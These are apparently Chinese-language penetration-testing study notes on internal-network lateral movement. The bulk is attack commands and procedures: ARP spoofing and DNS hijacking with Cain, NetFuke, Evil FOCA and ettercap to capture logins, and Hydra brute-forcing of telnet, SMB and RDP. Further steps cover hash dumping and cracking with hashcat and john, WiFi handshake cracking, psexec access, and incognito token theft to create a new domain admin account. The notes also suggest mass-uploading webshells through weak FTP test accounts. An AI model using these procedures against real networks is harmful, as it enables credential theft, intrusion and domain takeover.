04横向渗透

流量监听工具使用
ARP欺骗原理的利用
常见的服务爆破
Shell控制连接
本地rdp密码读取

横向渗透的方法:
1.了解网络(信息搜集)
分析网络中有 哪些主机(pc ,server:linux/windows,打印机.)
服务器:分析服务,分析端口
扫描器分析服务
服务攻击有哪些方法:
1.爆破 smb文件共享
2.漏洞 smb445 ,linux22
3.欺骗
4.钓鱼

PART 1: 流量监听工具使用
流量监听工具的使用
常用工具：
wiresharke (网工)
cain (渗透) 低版本服务器好用

监听内容：(未加密的一些服务协议)
服务连接密码
网站登录密码
敏感数据

工具,嗅探分析 ---CainAbel-v4.9.53
环境 03 抓win7 都是nat网段 207.129 /207.132
用arp欺骗

目前我们能抓http流量,但要抓https怎么办
1.我们强制它转换使用http流量
2.钓鱼

cain (渗透:
win7访问www.sdmm12.com/wp-admin
03:
start/stop Sinffer
点击后添加需要抓取的网卡 //里边也有端口过滤,也可以修改,比如抓的http流量不是80,而是8080,非标准协议

结果:
207.1 物理机
207.2 网关
207.132 目标机
207.255

点击ARP进行欺骗 //扫出来后对 207.132
点击右边空白处, 在次点击+ 添加207.2网关
+号里点击网关后右边是从网关出去的,选到207.132,在确定,点击栏目上ARP欺骗
这一次,03就会给win7和路由器发包进行欺骗

如何查看是否被欺骗成功
arp- -a //网关地址和03地址都成为一样的了

win7输入密码
回过03会出现07的访问报文,在最下方找到password类,就出现了07的密码
密码包含服务器时间地址,账号密码,访问地址表单

FTP,tetue也可以抓到

wiresharke (网工)
工具嗅探分析:wiresharke
在目录里打开wireshark.exe

栏目:抓包,网络接口开始

过滤框输入:http 所有http流量
输入:http&&ip.src==192.168.207.129 所有129的流量
参数:src是我去访问. dst是访问我的
包太对就用右键根据TCP码流 去分析
找到登录框那种post表单打开就能看到提交的密码

wiresharke 抓取整个内网的流量
抓取内网不同网段进行纵向渗透
多百度,升级版本

PART 2: arp欺骗原理与利用
win3欺骗win7
常用工具：
Netfuck
Foca evail

主要功能：
域名欺骗
网页内容欺骗
Dns解析欺骗
解析欺骗+钓鱼攻击案例

Netfuck
win7欺骗03
老工具,配合钓鱼效果可以,低版本可以
嗅探分析:NetFuke_1.07
记得先装winpcap.exe

打开软件:
设置--嗅探设置启用:启用ARP欺骗,启用分析器,启用混杂模式监听,启用修改器,关闭转发,关闭缓冲回显,启用过滤器,主动转发
不要点击icmp 那是ping欺骗没意义,
选择网卡,一定要显示出网段地址

设置-ARP欺骗--一般选择双向
来源ip写网关.目标ip就目标的
确定就行 ,也可以指定mac地址进行伪造

主页插件管理小扳手里面,修改器,http网页,可以往里面写入超文本以及js钓鱼页面等
都确定
右上角,点击启动

回到win7
随便登录都会被欺骗

配合钓鱼页面,无文件攻击,强制下载启动就会拿到权限
------------------------------

Foca evail
win7--win10可以用的可以
需要环境dotnet461_withfix_chs.zip 在漏洞分析里
工具嗅探分析:EvilFocaSetup.msi

都默认安装:
进入后就会让你选择哪个网卡,选择后直接进入,会自动在左边分析出来
支出ipv6 ipv4 dos dns

先来:ipv4中间人攻击--ARPipconfig
+号选择网关 右边选择欺骗03
确定就行start开始

在dns劫持:
dns劫持,劫持的是解析过程
例如:domain:www.baidu.com
ip:公网的钓鱼网站 192.168.124.30

----------------------

ettercap

中间人攻击 kali 攻击win7
配置步骤：
1、ettercap -G 打开图形界面
2、修改 /etc/etter.conf 文件 去掉一些注释信息打开某些功能（这里开启Linux功能）
3、打开Linux注释部分
执行 echo 1 >
/proc/sys/net/ipv4/ip_forward 开启转发功能

1、启动unified sniffing
2、选择侦听的网卡
3、扫描存活主机
4、查看主机列表
5、选择攻击目标设为目标1
6、选择网关设为目标2
7、设置中间人
8、设置抓包
9、开始攻击
10、抓取密码

ettercap -G 打开图形界面
选择网卡,点击对勾
点击三个点 HSOTS
san fohosts 扫描这个网段的主机列表
host listl列出主机列表
选择win7ADD to target1 网关ADD to target2
圆圆圈--ARPpoisoning

win7登录网页密码就能获取到了

 

DNS欺骗:
vi /etc/ettercap/etter.dns 配置这个文件
找到 有微软.com的那一栏的下边
添加www.baidu.com A 192.168.207.1钓鱼页面
ettercap -G
选择网卡,点击对勾
点击三个点 HSOTS
san fohosts 扫描这个网段的主机列表
host listl列出主机列表
选择win7ADD to target1 网关ADD to target2
圆圆圈--ARPpoisoning
三个点--Plugins---mange(管理插件)
dns_spoof双击 出现*就可以了
win7访问百度,出现跳转钓鱼页面

命令行的使用
ettercap -T -q -i eth0 -M arp:remote //192.168.207.132// /192.168.207.2//

 

--------
1.sssx转普
2.百度搜索 kali 抓取https
只能抓取能接收http和https的网站

--------------------------------------------------
PART 3: 服务密码攻击

密码分析工具的使用
Hash-identifier

服务密码攻击
常见的服务协议：
smb
telnet
ftp
3389
mssql
mysql
等等

服务攻击工具
Hydra
ftp爆破工具
3389爆破工具
Ssh爆破工具

爆破后的利用分析

密码攻击分为两种:在线密码攻击,离线密码攻击

在线密码攻击,通过网络登录去破解
不仅电脑性能得强,字典要强,网络要强
-------------------------

离线密码攻击.得到密文去加载字典本地爆破,靠cpu或者gpu性能爆破,离线爆破提升电脑性能即可
-----------------------

扫描端口 分析服务进行爆破攻击
哪些服务可能被爆破:
smb
telnet
ftp
3389
mssql
mysql
等等

1 linux 22/80/443
2 windows 135/139/445/3306/3389/1433 telnet
如果开了这些端口,先跑445因为响应快.

Hydra:
hydra -l adminsitrator -P pass.txt -t 30 -vV telnet://192.168.8.155 //爆23端口
hydra -l adminsitrator -P pass.txt -t 30 -vV smb://192.168.8.155 //爆ssb
hydra -l adminsitrator -P pass.txt -t 30 -vV rdp://192.168.8.155 //3389

字典:密码破解
csdnpass 大字典
pas 人名前500用户名字典
pass 爆后台常用
猪猪侠字典和工具打包
PASS.jar 社工生成字典

生成技巧
爆后台:管理员邮箱,生日,电话.

kali:crunch 4 6 zhang2008 -o pass.txt 4-6位密码用zhang2008 保存pass.txt
/usr/share/crunch/charset.lst 这里是他字典规则,cat 可以查看
crunch 8 8 -f /usr/share/crunch/charset.lst numeric
--------------------------------

离线密码破解
Hashcat+hash-identifier
Hashcat系列软件是比较牛逼的密码破解软件，系列软件包含Hashcat、oclHashcat；还有一个单独新出的oclRausscrack。其区别为Hashcat只支持cpu破解；oclHashcat和oclGausscrack则支持gpu加速。oclHashcat则分为AMD版和NIVDA版。

hashcat //回车可以看帮助
是用编号选择的
-m 指定hash类型//例如是md5 -m 0 把我的明文字典进行加密匹配
-a 指定爆破模式 找到[Attack Modes]攻击模式 //
0 straight 加载字典 3 Brute-fore 边生成边爆

用法：
使用字典破解密码
hashcat a.hash -m 0 -a 0 pass -o 123.txt --force
//存放要爆破的hash文件,把密码变成md5,加载字典,密码字典,把结果输出到123.txt,强制用爆破类型

掩码爆破:
记住帮助里的?Charset
l代表26个小写字符
u代表26个大写
d代表012345679 数字
h代表小写16进制
H代表大写16精致
s代表特殊符号
a代表把以上全部包含
b 0*00-0*ff

如果知道密码是纯数字就这样写
hashcat a.txt -m 0 -a 3 ?d?d?d?d?d?d?d //就会1-8位用纯数字匹配

如果知道密码前4位斯小写字母就这样写
hashcat a.txt -m 0 -a 3 ?l?l?l?l?d?d?d //就会1-8位用纯数字匹配

破解5位未知密码并且自定义密码组合
hashcat -m 0 -a 3 test.hash --custom-charset1=xiao --custom-charset2=?d ?1?2?2?2?2
把想用的字符写进去 例如xiao

--custom-charset1=?l?d ?1?1?1?1?1?1?1?1 //?1就是数字和小写字母的组合 不知道几位就多些几个?1

hash-identifier:
这个工具是识别出密文的加密算法,例如把加密后的md5放进去就能识别出来是md5加密

把我们的明文加密成密文,来匹配密文字典

获得了hash之后,cmd5破解网站破解不出来的话,可以尝试本地hash离线破解

------------------------------
john
破解windows密码
用hashdump7或者mimikatz 导出windowshash为pass.txt
john –format=NT pass.txt

破解Linux shadow文件
john --format=sha512crypt shadow  //john暴力破解密码
john --w:password.lst--format=sha512crypt shadow  //john字典暴力破解密码

例如获取了linux里的 /etc/shadow文件里的密文
什么情况下会获取呢?
st2代码执行漏洞,权限会很大,可以读取的.root权限,可以读取shadow文件
破解方法:
cat /etc/shadow > 1.txt 先把他导入到1.txt
john 1.txt进行爆破, 他会对文本里的东西进行自动的识别.
john 1.txt --show 去查看他的密码

上面是linux的演示
现在是windows演示
工具权限提升--windows---getpass--抓hash
放到目标机器
cmd切换到桌面直接启动即可.
pudump7.exe >1.txt 可以把抓到的hash导入到桌面
john 1.txt进行破解 这个速度还是很快的
----------------------------------------

压缩包密码爆破
Fcrackzip
rarcrack

apt-get install fcrackzip
参数设置

 fcrackzip -b -c1 -u test.zip
 (－b 指定模式为暴破，-c1指定密码类型为纯数字，其它类型可以rtfm,-u这个参数非常重要不然不显示破解出来的密码,-l 5-6可以指定长度)
命令：fcrackzip -b -ca -l 1-4 -u 压缩文件
       解释：-b 暴力破解模式 -c 指定掩码类型（a=a-z;1=0-9;!=特殊字符） -l 密码长度 -u 压缩文件名

   fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 压缩文件名
   解释：-D 为使用字典  -p为使用字符串作为初始密码文件

fcrackzip -b -c1 -l 1-6 -u 12.zip
fcrackzip -b -ca -l 1-9 -u 1.zip

--------------------------------
rarcrack
该软件用于暴力破解压缩文件的密码，但仅支持RAR, ZIP, 7Z这三种类型的压缩包
执行命令: rarcrack 文件名 -threads 线程数 -type rar|zip|7z

rarcrack test.rar --10 --rar

如果允许出现错误
那么可以执行sudo apt-get install libxml2-dev libxslt-dev进行修复。
--------------------------

Wifi密码破解 //最好买一个usb的wifi网卡,然后在禁用本地的网卡.这样本地的mac不会被抓取

输入：ifconfig 查看网卡
第一步：先输入airmon-ng check kill结束进程
第二步：输入：airmon-ng start wlan0（对应网卡） 开启监听模式
第三步：他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0
第四步：建立监听 airodump-ng wlan0mon 记住信道 名称和mac地址 CH MAC
第五步：airodump-ng -c 4 -w result --bssid 目标mac wlan0mon 抓包
第六步：aireplay-ng -0 10 -a 目标ap的mac -c 客户端mac wlan0mon
第七步：aircrack-ng -w 字典文件 捕获cap数据库文件 xx.cap
--------------------------------------------------

ftp爆破工具
密码破解ftp等爆破
hscangui汉化版..exe
打开后左下角菜单选中模块---里面勾选ftp
参数 ,指定要跑的网段
开始跑就可以了

为什么要爆ftp
web服务器 ,要分析搭建平台,如果是iis自带的fit那爆破了作用也不大

阿里云的如果爆出404 他会把你的路径爆出来,路径的最后一节就是用户
c:/inetwpud/www/qxe123123/ qwe123123就是用户名称
qwe12312 ftp用户 数据库用户 ,虚拟空间用户 三合一的
阿里云是拦截速度的,所有买个阿里云的白名单去跑阿里云/实验室/运营机房这些ip
上面是自带的.

下面是自己装的
软件集成搭建的网站
ftp服务器的软件是 g6 serveru filezilla //这一类网站 大多都有测试账号,ceshi/test/admin,要不账号密码一样,要不密码弱口令
拿到测试的账号就可以批量写马,写个脚本,列出所有二级目录,挨个上传即可. 有21端口就链接看看 ftp 192.513.135.123 版本低的最好去尝试爆破一下

工具3389
太慢了 还不如爆445

Phpmyadmin爆破
搞站会用 ,也可以ip/Phpmyadmin
ip888 999 9999 7777

PART 4: shell控制连接
爆破成功之后 445 去链接的
内网安全里psexec.exe

获取本地账号密码，构造跳板
获取明文密码可以用getpss.exe
获取账号hash可以用pwdum7
通过得到的账号密码信息链接跳板机
psexec.exe \\192.168.207.129 -u hao123 -p 123123 cmd
psexec.exe \\192.168.200.11 -u administrator -p 123123 cmd 开启防火墙就链接不上

内网安全里 incognito2 密码123
incognito.exe list_tokens -u 查看本机可以利用的token //普通用户也可以调用的
incognito.exe -h 192.168.207.129 -u admin -p 123123 list_tokens -u 查看远程机器可以利用的token
C:\incognito2>incognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "NT
AUTHORITY\SYSTEM" cmd.exe 调用远程机器的本地系统权限的cmd.exe

链接后可用pawoshell远程调用命令把文件下载进去

如果普通用户 不行的话就用msf的incognto2 貌似,盗版链接不上 ,正版可以链接.

查找被攻击的计算机中是否有DA的token
incognito.exe -h 192.168.200.11 -u admin -p 123123 list_tokens -u 查看远程机器可以利用的token

利用DA的token创建新的DA
C:\incognito2>incognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "CRA
CER\ADMINISTRATOR" cmd.exe 调用DA的cmd.exe //劫持域的身份
执行创建DA命令
Net user x 123.com /add /domain 用域的身份创建用户
Net group “domain admins” x /add /domain 把x用户 加入到管理员组

1.扫描端口
2.爆破445
3.可以使用psexec 登录 cmd
4.incognito 劫持token 如果有域管理员token 劫持da 创建一个

 https://github.com/604238181/-